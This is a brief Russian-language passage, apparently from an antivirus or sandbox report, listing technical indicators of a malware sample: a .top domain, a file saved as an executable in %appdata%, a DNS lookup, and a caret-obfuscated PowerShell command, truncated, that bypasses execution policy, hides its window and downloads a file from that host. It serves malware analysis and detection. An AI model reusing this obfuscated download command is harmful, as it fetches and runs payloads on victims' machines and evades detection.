Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeR^S^H^el^L.E^Xe ^-^ExE^C^u^t^iO^NPolICy^ ^bYpAs^s -^n^O^ProFi^L^E ^-windows^TylE ^hi^dd^EN (neW^-O^bjeC^t^ SYstEM^.NE^T.^W^ebC^li^ENT).D^O^WnL^oA^D^F^i^le^('http://truthf...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /C "POWeR^S^H^el^L.E^Xe ^-^ExE^C^u^t^iO^NPolICy^ ^bYpAs^s -^n^O^ProFi^L^E ^-windows^TylE ^hi^dd^EN (neW^-O^bjeC^t^ SYstEM^.NE^T.^W^ebC^li^ENT).D^O^WnL^oA^D^F^i^le^('http://truthf...' (со скрытым окном)